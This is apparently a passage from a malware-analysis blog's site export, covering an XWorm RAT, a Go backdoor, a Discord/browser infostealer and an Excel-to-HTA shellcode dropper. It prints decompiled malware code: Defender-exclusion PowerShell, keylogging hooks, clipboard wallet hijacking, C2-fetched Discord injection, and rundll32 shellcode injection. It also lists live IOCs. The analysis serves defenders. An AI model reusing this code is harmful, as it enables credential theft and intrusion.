8rijndaelManaged.Mode = CipherMode.ECB; 9ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(); 10byte[] array2 = Convert.FromBase64String(3pXqYfeWgCBZOAYUjYnh); 11return ACX0qTJzEzq40qP5qFxb.sJljw7gGxcYB8jRe1fPv(cryptoTransform.TransformFinalBlock(array2, 0, array2.Length)); Windows Defender Bypass # Added exclusions for both the file path and process name to prevent Defender from scanning or terminating the dropped binary:\n1powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \u0026#39;C:\\Users\\Admin\\AppData\\Roaming\\WmiPrvSE.exe\u0026#39; 2powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \u0026#39;WmiPrvSE.exe\u0026#39; Keylogging # Installed a low-level keyboard hook via SetWindowsHookEx to capture all keystrokes system-wide. It renames it to v2H7UaTp8QLeiqSYflzi3sclFElatUojEHCwvOIoXHXii3FlZocIVLQx9c8vO5vW9iL6KiRzIfUyn. Each captured key was normalized — special keys were mapped to readable labels — and written to a log file grouped by active window title. U\n1[DllImport(\u0026#34;user32.dll\u0026#34;, CharSet = CharSet.Auto, EntryPoint = \u0026#34;SetWindowsHookEx\u0026#34;, SetLastError = true)] Key normalization from the hook callback:\n1if (Operators.CompareString(left, \u0026#34;Space\u0026#34;, false) == 0) obj2 = \u0026#34;[SPACE]\u0026#34;; 2else if (Operators.CompareString(left, \u0026#34;Return\u0026#34;, false) == 0) obj2 = \u0026#34;[ENTER]\u0026#34;; 3else if (Operators.CompareString(left, \u0026#34;Escape\u0026#34;, false) == 0) obj2 = \u0026#34;[ESC]\u0026#34;; 4else if (Operators.CompareString(left, \u0026#34;LControlKey\u0026#34;, false) == 0) obj2 = \u0026#34;[CTRL]\u0026#34;; 5else if (Operators.CompareString(left, \u0026#34;RControlKey\u0026#34;, false) == 0) obj2 = \u0026#34;[CTRL]\u0026#34;; 6else if (Operators.CompareString(left, \u0026#34;RShiftKey\u0026#34;, false) == 0) obj2 = \u0026#34;[Shift]\u0026#34;; 7else if (Operators.CompareString(left, \u0026#34;LShiftKey\u0026#34;, false) == 0) obj2 = \u0026#34;[Shift]\u0026#34;; 8else if (Operators.CompareString(left, \u0026#34;Back\u0026#34;, false) == 0) obj2 = \u0026#34;[Back]\u0026#34;; 9else if (Operators.CompareString(left, \u0026#34;LWin\u0026#34;, false) == 0) obj2 = \u0026#34;[WIN]\u0026#34;; 10else if (Operators.CompareString(left, \u0026#34;Tab\u0026#34;, false) == 0) obj2 = \u0026#34;[Tab]\u0026#34;; 11else if (Operators.CompareString(left, \u0026#34;Capital\u0026#34;, false) == 0) 12...[snip]... Clipboard Hijacking # Monitored the clipboard for content matching Bitcoin, Ethereum, and TRON wallet address patterns using hardcoded regex. When a match was found, the clipboard content was silently replaced with the attacker\u0026rsquo;s wallet address:\n1public static readonly Regex S0cI7Hk6bzcFtEvd7Fqm = new Regex(\u0026#34;\\\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\\\\b\u0026#34;); 2public static readonly Regex KsKw6uC5CNpIU5XtEe7i = new Regex(\u0026#34;\\\\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\\\\b\u0026#34;); 3public static readonly Regex 2AsDRG7TDiHYSfLmSTs2 = new Regex(\u0026#34;T[A-Za-z1-9]{33}\u0026#34;); C2 Communication # Connected to C2 servers via TCP and transmitted an INFO packet containing HWID, username, OS version, and AV status — encrypted with the AES-ECB key from the config. Data was prefixed with a length header. Periodic PING! packets were sent to maintain the connection. Outbound requests used hardcoded User-Agent strings to blend with normal browser traffic:\n1\u0026#34;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\u0026#34;, 2\u0026#34;Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1\u0026#34;, 3\u0026#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\u0026#34; The malware also called RtlSetProcessIsCritical from ntdll.dll to mark itself as a critical process — causing a BSOD if terminated:\n1[DllImport(\u0026#34;NTdll.dll\u0026#34;, EntryPoint = \u0026#34;RtlSetProcessIsCritical\u0026#34;, SetLastError = true)] 2public static extern void H8daqEsgsEVBpFZFnlWT([MarshalAs(UnmanagedType.Bool)] bool tW8JLDDvidchK66hQUnZ, [MarshalAs(UnmanagedType.Bool)] ref bool IgYCKHiXpqcNX0SKbJFS, [MarshalAs(UnmanagedType.Bool)] bool tZzpk5hGM0iIAqJM0bgw); IOCs # Files\n- xworm.exe\n- SHA256: ced525930c76834184b4e194077c8c4e7342b3323544365b714943519a0f92af\n- MD5: 7c7aff561f11d16a6ec8a999a2b8cdad\n- %APPDATA%\\WmiPrvSE.exe — persistence copy\n- %TEMP%\\xworm.exe.config — encrypted config\nNetwork\n- C2: 185.117.250.169:7000\n- C2: 66.175.239.149:7000\n- C2: 185.117.249.43:7000\nRegistry\n- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WmiPrvSE\nScheduled Tasks\n- WmiPrvSE — executes every 1 minute with HIGHEST privileges\nCrypto Wallets (attacker)\n- Bitcoin: bc1q2a4jgxmvslng5khwvzkt9pechms20ghff42s5g\n- Ethereum: 0x10cE3E5678f40f0B94A2fB5003f04012ecA407C5\nMITRE ATT\u0026amp;CK # Technique ID Description Scheduled Task/Job T1053.005 WmiPrvSE scheduled task every 1 minute Registry Run Keys T1547.001 HKCU...\\Run\\WmiPrvSE Shortcut Modification T1547.009 .lnk in Startup folder Masquerading T1036.005 Renamed to WmiPrvSE.exe Disable or Modify Tools T1562.001 Windows Defender exclusions via PowerShell Virtualization/Sandbox Evasion T1497.001 WMI Win32_ComputerSystem VM check Input Capture: Keylogging T1056.001 SetWindowsHookEx low-level keyboard hook Clipboard Data T1115 Crypto wallet address hijacking Encrypted Channel T1573 AES-ECB encrypted C2 communication Data Obfuscation T1001 Length-prefixed TCP packets + PING keepalive Attack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Start([xworm.exe Executed]):::input --\u003e Drop[Drop WmiPrvSE.exe%APPDATA%]:::exec subgraph Evasion [Evasion] Drop --\u003e AntiVM:::check AntiVM -.-\u003e|VM Detected| Exit[Exit]:::term AntiVM -- Pass --\u003e Defender[Disable DefenderAdd-MpPreference Exclusions]:::exec Defender --\u003e Critical[RtlSetProcessIsCriticalBSOD on Kill]:::exec end subgraph Persistence [Persistence] Critical --\u003e Task[Scheduled TaskWmiPrvSE every 1min]:::exec Critical --\u003e Startup[Startup Folder.lnk Shortcut]:::exec Critical --\u003e Registry[HKCU\\\\Run\\\\WmiPrvSE]:::exec end subgraph Collection [Collection] Task --\u003e Keylog[SetWindowsHookExKeylogger]:::exec Task --\u003e Clipboard[Clipboard HijackingBTC / ETH / TRON]:::exec end subgraph C2 [C2 Communication] Keylog --\u003e C2Server[TCP AES-ECBINFO + PING]:::exec Clipboard --\u003e C2Server C2Server --\u003e IP1((185.117.250.169:7000)):::exec C2Server --\u003e IP2((66.175.239.149:7000)):::exec C2Server --\u003e IP3((185.117.249.43:7000)):::exec end ","date":"March 1, 2026","externalUrl":null,"permalink":"/investigations/cdef-xworm/","section":"","summary":"A .NET XWorm RAT that establishes triple persistence via scheduled task, startup shortcut, and registry Run key, implements keylogging, clipboard hijacking for crypto wallets, and communicates with multiple C2 servers over TCP using AES-ECB encrypted payloads.","title":"CDEF-XWorm","type":"investigations"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/clipboard-hijacking/","section":"Tags","summary":"","title":"Clipboard Hijacking","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/cryptocurrency-stealer/","section":"Tags","summary":"","title":"Cryptocurrency Stealer","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/dnspy/","section":"Tags","summary":"","title":"Dnspy","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/sandbox/","section":"Tags","summary":"","title":"Sandbox","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/xworm/","section":"Tags","summary":"","title":"XWorm","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/debug/","section":"Tags","summary":"","title":"Debug","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/golang/","section":"Tags","summary":"","title":"Golang","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-02-08 TL;DR # A Go-based backdoor that copies itself to C:\\Systemlogs\\logscheck.exe, establishes persistence via HKCU\\...\\Run\\HealthCheck, enumerates connected drives via GetDriveType, and attempts to connect to malware.invalid.com.\nInitial Analysis # 1secretPictures.exe: PE32+ executable (console) x86-64, 8 sections 2SHA256: 80e82415a26ac7c0124bbaa2133192dadd51cbc5ed22b202ebb24f6fddf8c8ab Static analysis confirmed the binary was written in Go.\nSandbox Analysis # Seconds after execution the sample copied itself to C:\\Systemlogs\\ and renamed itself to logscheck.exe.\nPersistence # A registry Run key was set to execute logscheck.exe on every user login:\n1HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\HealthCheck C2 Communication # The sample attempted to connect to the hardcoded domain malware.invalid.com.\nDrive Enumeration # The sample called the GetDriveType WinAPI function to enumerate all connected drives — likely to identify removable media or network shares for lateral movement or data staging.\nIOCs # Files\n- secretPictures.exe\n- SHA256: 80e82415a26ac7c0124bbaa2133192dadd51cbc5ed22b202ebb24f6fddf8c8ab\n- C:\\Systemlogs\\logscheck.exe — persistence copy\nRegistry\n- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\HealthCheck\nNetwork\n- C2 Domain: malware.invalid.com\n","date":"February 28, 2026","externalUrl":null,"permalink":"/investigations/htb-secretpictures/","section":"","summary":"A Go-based backdoor that copies itself to a system directory, establishes persistence via a registry Run key, enumerates connected drives, and attempts to connect to a hardcoded C2 domain.","title":"HTB-SecretPictures","type":"investigations"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-08 TL;DR # A fake therapy installer distributed as an NSIS self-extracting archive delivers an Electron-based Node.js infostealer. After passing anti-VM checks, it injects malicious code into Discord clients, harvests Discord tokens, browser cookies, saved passwords, and autofill data, and exfiltrates everything to illitmagnetic.site.\nInitial Analysis # It is a NSIS self-extracting archive. An NSIS package is essentially a self-extracting archive coupled with an installation system that supports a scripting language. It contains compressed files, along with installation instructions written in the NSIS scripting language.\n1nsis-installer.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, Nullsoft Installer self-extracting archive, 5 sections 27a95214e7077d7324c0e8dc7d20f2a4e625bc0ac7e14b1446e37c47dff7eeb5b 3imphash: b34f154ec913d2d2c435cbd644e91687 The binary contained a digital signature with the program name Windows Update Assistant NSIS # To access the contents without running the installation package, I used 7-Zip.\n1$ 7z x nsis-installer.exe -o./extracted/ 2Extracting archive: nsis-installer.exe 3...[snip]... 4 5Everything is Ok 6 7Files: 8 8Size: 78250603 9Compressed: 78057262 NSIS supports a plugin system, which consists of DLL files that are placed by default in the $PLUGINSDIR directory.\n1. 2├── $PLUGINSDIR 3│ ├── app-32.7z 4│ ├── nsExec.dll 5│ ├── nsis7z.dll 6│ ├── SpiderBanner.dll 7│ ├── StdUtils.dll 8│ ├── System.dll 9│ └── WinShell.dll 10└── $R0 11 └── Uninstall SerenityTherapyInstaller.exe - nsis7z.dll — 7z extraction plugin\n- nsExec.dll — command execution plugin\n- System.dll — direct WinAPI call plugin\n- StdUtils.dll — extended NSIS utilities\n- SpiderBanner.dll** — UI plugin\n- WinShell.dll — Windows Shell integration plugin\n- app-32.7z - main funcionallity\nElectron Application # Unpacking app-32.7z revealed an Electron application — a Chromium and Node.js runtime packaged as a Windows executable, allowing JavaScript malware to run as a native process:\n1...[snip]... 2├── resources 3│ ├── app.asar 4│ └── elevate.exe 5├── SerenityTherapyInstaller.exe 6...[snip]... The app.asar archive was extracted with asar. The extracted folder contains:\n1app.js: JavaScript source, ASCII text, with very long lines (65536), with no line terminators 2node_modules: directory 3package.json: JSON text data Malware\u0026rsquo;s dependencies:\n1{ 2 \u0026#34;name\u0026#34;: \u0026#34;SerenityTherapyInstaller\u0026#34;, 3 \u0026#34;version\u0026#34;: \u0026#34;1.0.0\u0026#34;, 4 \u0026#34;main\u0026#34;: \u0026#34;app.js\u0026#34;, 5 \u0026#34;nodeVersion\u0026#34;: \u0026#34;system\u0026#34;, 6 \u0026#34;bin\u0026#34;: \u0026#34;app.js\u0026#34;, 7 \u0026#34;author\u0026#34;: \u0026#34;SerenityTherapyInstaller Inc\u0026#34;, 8 \u0026#34;license\u0026#34;: \u0026#34;ISC\u0026#34;, 9 \u0026#34;dependencies\u0026#34;: { 10 \u0026#34;@primno/dpapi\u0026#34;: \u0026#34;1.1.1\u0026#34;, 11 \u0026#34;node-addon-api\u0026#34;: \u0026#34;^7.0.0\u0026#34;, 12 \u0026#34;sqlite3\u0026#34;: \u0026#34;^5.1.6\u0026#34;, 13 \u0026#34;systeminformation\u0026#34;: \u0026#34;^5.21.22\u0026#34; 14 } 15} Deobfuscation # app.js was heavily obfuscated with hex-encoded identifiers and arithmetic string lookups. Deobfuscation with Obfuscator.io produced no usable result.\n1var _0x448105 = _0x14c9; 2(function(_0x2f383b, _0x170714) { 3 var _0x5f100f = _0x14c9, _0x3c3f7b = _0x2f383b(); 4 while (!![]) { 5 try { 6 var _0x2e3a8b = -parseInt(_0x5f100f(0x1088)) / ... Dynamic Analysis # The obfuscated script was analyzed using the VS Code Debugger. A version conflict with the bundled sqlite3 module was identified on first run:\nOn the second run, the deobfuscated script appeared in the \u0026ldquo;Loaded Scripts\u0026rdquo; panel as \u0026lt;eval\u0026gt; / VM46947589 — 800+ lines of readable JavaScript:\nStatic Analysis # The decompiled source reveals the full capability set of the malware:\ngetDiscordTokens, discordInjection - harvests Discord tokens and injects malicious code into the Discord client stealFirefoxTokens - extracts saved session tokens from Firefox browserCookies, getBrowserCookies, getFirefoxCookies — steals cookies across Chromium-based browsers and Firefox browserPasswords, getBrowserPasswords — extracts saved credentials from browser password stores browserAutofills, getBrowserAutofills — harvests autofill data tokenRequests, checkToken — validates and exfiltrates harvested tokens newInjection - generic injection capability checkCmdInstallation — checks for presence of specific tools, likely for persistence or lateral movement kill — terminates processes C2 config # Сontained a hardcoded configuration block that revealed the С2 domain illitmagnetic.site, target Discord user ID, and whether to log out the victim from Discord after token theft.\n1const options = { 2 api: \u0026#39;https://illitmagnetic.site/api/\u0026#39;, 3 user_id: \u0026#39;6270048187\u0026#39;, 4 logout_discord: \u0026#39;false\u0026#39; 5}; Anti-VM # Exits if RAM is under 2GB, hostname matches a hardcoded blocklist of known analysis machines, or kills any recognized analysis tools found in the running process list.\n1function checkVm() { 2 if(Math.round(totalmem() / (1024 * 1024 * 1024)) \u0026lt; 2) process.exit(1); 3 if([\u0026#39;bee7370c-8c0c-4\u0026#39;, \u0026#39;desktop-nakffmt\u0026#39;, \u0026#39;win-5e07cos9alr\u0026#39;, ... 4 ].includes(hostname().toLowerCase())) process.exit(1); 5 6 const tasks = execSync(\u0026#39;tasklist\u0026#39;); 7 [\u0026#39;wireshark\u0026#39;, \u0026#39;fiddler\u0026#39;, \u0026#39;vboxservice\u0026#39;, \u0026#39;vmtoolsd\u0026#39;, \u0026#39;ida64\u0026#39;, \u0026#39;x32dbg\u0026#39;, ... 8 ].forEach((task) =\u0026gt; { 9 if(tasks.includes(task)) 10 execSync(`taskkill /f /im ${task}.exe`); 11 }); 12}; Discord Injection # Fetched a malicious index.js from the C2 and overwrote the legitimate discord_desktop_core-1/index.js in all installed Discord variants (Discord, DiscordCanary, DiscordPTB), then restarted the client to load the injected code:\n1async function discordInjection() { 2 [join(LOCALAPPDATA, \u0026#39;Discord\u0026#39;), join(LOCALAPPDATA, \u0026#39;DiscordCanary\u0026#39;), 3 join(LOCALAPPDATA, \u0026#39;DiscordPTB\u0026#39;)].forEach(async(dir) =\u0026gt; { 4 const data = await fetch(options.api + \u0026#39;injections\u0026#39;, ...); 5 writeFileSync(discord_index, data?.discord); 6 await kill([\u0026#39;discord\u0026#39;, \u0026#39;discordcanary\u0026#39;, \u0026#39;discordptb\u0026#39;]); 7 exec(`Update.exe --processStart Discord.exe`); 8 }); 9}; checkCmdInstallation # Verified the presence of cmd.exe at C:\\Windows\\system32\\cmd.exe. If absent — a sandbox or restricted environment indicator — it fetched a replacement cmd.exe from the C2 and wrote it to %USERPROFILE%\\Documents\\, then redirected ComSpec to point to the downloaded binary.\n1async function checkCmdInstallation() { 2 if(!existsSync(\u0026#39;C:\\\\Windows\\\\system32\\\\cmd.exe\u0026#39;)) { 3 const response = await fetch(options.api + \u0026#39;cmd-file\u0026#39;, ...); 4 writeFileSync(join(process.env.USERPROFILE, \u0026#39;Documents\u0026#39;, \u0026#39;cmd.exe\u0026#39;), 5 Buffer.from(response?.buffer)); 6 process.env.ComSpec = join(process.env.USERPROFILE, \u0026#39;Documents\u0026#39;, \u0026#39;cmd.exe\u0026#39;); 7 } 8}; Browser Data Collection # Killed all running browser processes before accessing locked database files, then collected cookies, saved passwords, and autofill entries from Chromium-based browsers by decrypting the Local State master key via DPAPI and decrypting each value with AES-256-GCM. Firefox cookies were read directly from moz_cookies via SQLite. All collected data was POSTed to options.api + 'browsers-data'.\nnewInjection # Collected system fingerprint data (OS, CPU, RAM, uptime) and the victim\u0026rsquo;s external IP via ipinfo.io, then reported the infection to options.api + 'new-injection' along with the list of successfully injected Discord clients.\nSandbox # IOCs # Files\n- nsis-installer.exe\n- SHA256: 7a95214e7077d7324c0e8dc7d20f2a4e625bc0ac7e14b1446e37c47dff7eeb5b - SerenityTherapyInstaller.exe\nNetwork\n- C2 API: https://illitmagnetic.site/api/\n- Fingerprint: https://ipinfo.io/json\n- Discord API: https://discord.com/api/v10\nRegistry / Filesystem\n- %USERPROFILE%\\Documents\\cmd.exe — dropped if cmd.exe absent\n- Discord discord_desktop_core-1\\index.js — overwritten with C2 payload\n","date":"February 28, 2026","externalUrl":null,"permalink":"/investigations/htb-subatomic/","section":"","summary":"A fake therapy installer distributed as an NSIS self-extracting archive delivers an Electron-based Node.js infostealer that performs anti-VM checks, injects malicious code into Discord clients, and exfiltrates browser credentials, cookies, autofill data, and Discord tokens to a hardcoded C2.","title":"HTB-Subatomic","type":"investigations"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/installer/","section":"Tags","summary":"","title":"Installer","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/nsis/","section":"Tags","summary":"","title":"NSIS","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/self-extracting-archive/","section":"Tags","summary":"","title":"Self-Extracting Archive","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/hta/","section":"Tags","summary":"","title":"HTA","type":"tags"},{"content":" Difficulty: Hard OS: Windows Date: 2026-02-23 TL;DR # A phishing HTML file poses as an invoice and delivers a macro-enabled Excel workbook (invoice-42369643.xlsm). Upon opening, the Auto_Open macro assembles an HTA payload from three hidden sources — shape metadata, an OLE stream, and the active cell selection — and executes it via mshta.exe. The HTA lowers macro security via registry modification, then drops obfuscated VBA code that injects shellcode into a spawned rundll32.exe process. The shellcode establishes a reverse shell connection to evil-domain.no over port 443.\ninitial analysis # The sample is an HTML file containing a single long line.\n1$ file * 2invoice-42369643.html: ASCII text, with very long lines (48949) Excel nalysis # Opened a html file in sandbox i downloaded a .xlsm file\n1invoice-42369643.xlsm: Microsoft Excel 2007+ Static analysis witz oleid confirmed the presence of suspicious VBA macros:\n1--------------------+--------------------+----------+-------------------------- 2Indicator |Value |Risk |Description 3--------------------+--------------------+----------+-------------------------- 4File format |MS Excel 2007+ |info | 5 |Macro-Enabled | | 6 |Workbook (.xlsm) | | 7--------------------+--------------------+----------+-------------------------- 8Container format |OpenXML |info |Container type 9--------------------+--------------------+----------+-------------------------- 10Encrypted |False |none |The file is not encrypted 11--------------------+--------------------+----------+-------------------------- 12VBA Macros |Yes, suspicious |HIGH |This file contains VBA 13 | | |macros. Suspicious 14 | | |keywords were found. Use 15 | | |olevba and mraptor for 16 | | |more info. 17--------------------+--------------------+----------+-------------------------- 18XLM Macros |No |none |This file does not contain 19 | | |Excel 4/XLM macros. 20--------------------+--------------------+----------+-------------------------- olevba # olevba was used to extract and analyze the VBA code:\n1+----------+--------------------+---------------------------------------------+ 2|Type |Keyword |Description | 3+----------+--------------------+---------------------------------------------+ 4|AutoExec |Auto_Open |Runs when the Excel Workbook is opened | 5|AutoExec |Label1_Click |Runs when the file is opened and ActiveX | 6| | |objects trigger events | 7|Suspicious|Environ |May read system environment variables | 8|Suspicious|Open |May open a file | 9|Suspicious|Write |May write to a file (if combined with Open) | 10|Suspicious|Output |May write to a file (if combined with Open) | 11|Suspicious|Shell |May run an executable file or a system | 12| | |command | 13|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)| 14|Suspicious|Chr |May attempt to obfuscate specific strings | 15| | |(use option --deobf to deobfuscate) | 16|Suspicious|Hex Strings |Hex-encoded strings were detected, may be | 17| | |used to obfuscate strings (option --decode to| 18| | |see all) | 19|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be | 20| | |used to obfuscate strings (option --decode to| 21| | |see all) | 22|IOC |LwTHLrGh.hta |Executable file name | 23+----------+--------------------+---------------------------------------------+ Seconds after opening, Auto_Open fires. It assembles the HTA payload from three hidden sources (ActiveSheet.Shapes(2).AlternativeText, OLE stream UZdcUQeJ.yTJtzjKX and Selection) and executes it via mshta.exe:\n1Sub Auto_Open() 2 Dim fHdswUyK, GgyYKuJh 3 Application.Goto (\u0026#34;JLprrpFr\u0026#34;) 4 GgyYKuJh = Environ(\u0026#34;temp\u0026#34;) \u0026amp; \u0026#34;\\LwTHLrGh.hta\u0026#34; 5 6 Open GgyYKuJh For Output As #1 7 Write #1, hdYJNJmt(ActiveSheet.Shapes(2).AlternativeText \u0026amp; UZdcUQeJ.yTJtzjKX \u0026amp; Selection) 8 Close #1 9 10 fHdswUyK = \u0026#34;msh\u0026#34; \u0026amp; \u0026#34;ta \u0026#34; \u0026amp; GgyYKuJh 11 x = Shell(fHdswUyK, 1) 12End Sub ActiveSheet.Shapes(2).AlternativeText — the \u0026ldquo;Alternative Text\u0026rdquo; field of the second Shape object on the worksheet. In Excel, Shape objects can be images, text boxes, charts, or other graphical elements embedded in a spreadsheet. In this case it stores a hidden encoded payload chunk invisible to the user. UZdcUQeJ.yTJtzjKX — an OLE stream containing a long base64 string: lvbk5hbWUgIiYiQXMgU3RyaW4iJiJ... Selection in this macro refers to whatever is currently selected in the Excel interface at the time the macro runs—this might be cell text, a range of cells. vmonkey # vmonkey emulation confirmed the macro behavior:\n1+----------------------+-----------------------------------------------+---------------------------------+ 2| Action | Parameters | Description | 3+----------------------+-----------------------------------------------+---------------------------------+ 4| Start Regular | | All wildcard matches will match | 5| Emulation | | | 6| Found Entry Point | auto_open | | 7| Object.Method Call | [\u0026#39;JLprrpFr\u0026#39;] | Application.Goto | 8| Environ | [\u0026#39;temp\u0026#39;] | Interesting Function Call | 9| OPEN | C:\\Users\\admin\\AppData\\Local\\Temp\\LwTHLrGh.ht | Open File | 10| | a | | 11| Object.Method Call | [-2147221504, \u0026#39;\u0026#39;, \u0026#39;\u0026#39;] | Err.Raise | 12| Dropped File Hash | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1 | File Name: LwTHLrGh.hta | 13| | d49c01e52ddb7875b4b | | 14| Execute Command | mshta C:\\Users\\admin\\AppData\\Local\\Temp\\LwTHL | Shell function | 15| | rGh.hta | | 16| Found Entry Point | label1_click | | 17| Found Entry Point | Label1_Click | | 18+----------------------+-----------------------------------------------+---------------------------------+ Sandbox \u0026amp; HTA Analysis # The malicious Excel file was executed in a sandbox. The dropped HTA file was extracted from the %temp% folder:\n1LwTHLrGh.hta: HTML document, ASCII text, with CRLF, LF line terminators hta file analysis # The HTA begins by creating a hidden Excel instance and a Wscript.Shell object, then modifies the registry to set AccessVBOM to 1, lowering macro security and allowing programmatic VBA injection:\n1Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule 2Set objExcel = CreateObject(\u0026#34;\u0026#34;Excel.Application\u0026#34;\u0026#34;) 3objExcel.Visible = False 4Set WshShell = CreateObject(\u0026#34;\u0026#34;Wscript.Shell\u0026#34;\u0026#34;) 5 6\u0026#39; Get the old AccessVBOM value 7RegPath = \u0026#34;\u0026#34;HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\u0026#34;\u0026#34; \u0026amp; objExcel.Version \u0026amp; \u0026#34;\u0026#34;\\Excel\\Security\\AccessVBOM\u0026#34;\u0026#34; 8 9\u0026#39; Weaken the target 10WshShell.RegWrite RegPath, 1, \u0026#34;\u0026#34;REG_DWORD\u0026#34;\u0026#34; 11 12\u0026#39; Run the macro 13Set objWorkbook = objExcel.Workbooks.Add() 14Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1) The rest of the HTA code is heavily obfuscated using four techniques: concatenation splitting (\u0026amp;) to break AV signatures, Chr() calls for special characters, VBA line continuation (_), and keyword fragmentation across concatenation boundaries:\n1xlmodule.CodeModule.AddFromString \u0026#34;\u0026#34;Private \u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;Type PRO\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;CESS_INF\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34; 2ORMATION\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp;\u0026#34;\u0026#34; hPro\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;cess As \u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;Long\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp;\u0026#34;\u0026#34; hThr\u0026#34;\u0026#34;\u0026amp; 3\u0026#34;\u0026#34;ead As L\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;ong\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp;\u0026#34;\u0026#34; dwPr\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;ocessId \u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;As Long\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp; 4\u0026#34;\u0026#34; dwTh\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;readId A\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;s Long\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp; _.... Deobfuscation # A Python script was used to deobfuscate the HTA by resolving Chr() calls, stripping concatenation operators and line continuations:\n1import re 2 3with open(\u0026#34;LwTHLrGh.hta\u0026#34;, \u0026#34;r\u0026#34;) as f: 4 data = f.read() 5 6data = re.sub(r\u0026#39;Chr\\((\\d+)\\)\u0026#39;, lambda m: chr(int(m.group(1))), data) 7data = data.replace(\u0026#39;\u0026#34;\u0026#39;, \u0026#39;\u0026#39;).replace(\u0026#39;\u0026amp;\u0026#39;, \u0026#39;\u0026#39;).replace(\u0026#39;_\u0026#39;, \u0026#39;\u0026#39;) 8 9with open(\u0026#34;clear.vba\u0026#34;, \u0026#34;w\u0026#34;) as f: 10 f.write(data) The deobfuscated VBA reveals shellcode injection into rundll32.exe:\n1myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36, 2-12,91,49,-55,-79,98,49,123,24,3,123,24,-125, 3-61,36,-76,-73,-126,-52,-70,56,123,12,-37...) 4 5If Len(Environ(\u0026#34;ProgramW6432\u0026#34;)) \u0026gt; 0 Then 6 sProc = Environ(\u0026#34;windir\u0026#34;) \u0026amp; \u0026#34;\\SysWOW64\\rundll32.exe\u0026#34; 7Else 8 sProc = Environ(\u0026#34;windir\u0026#34;) \u0026amp; \u0026#34;\\System32\\rundll32.exe\u0026#34; 9End If 10 11res = RunStuff(sNull, sProc, ByVal 0, ByVal 0, ByVal 1, ByVal 4, ByVal 0, sNull, sInfo, pInfo) 12 13rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), H1000, H40) 14 15For offset = LBound(myArray) To UBound(myArray) 16 myByte = myArray(offset) 17 res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0) 18Next offset 19 20res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) 21...[snip]... The shellcode is stored as a signed byte array. A Python script converts it to raw bytes:\n1myArray = [ 2 -35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98,49,123,24,3,123,24,-125, 3 -61,36,-76,-73,-126,-52,-70,56,123,12,-37,-79,-98,61,-37,-90,-21,109,-21,-83,-66,-127, 4 -128,-32,42,18,-28,44,92,-109,67,11,83,36,-1,111,-14,-90,2,-68,-44,-105,-52,-79,21,-48, 5 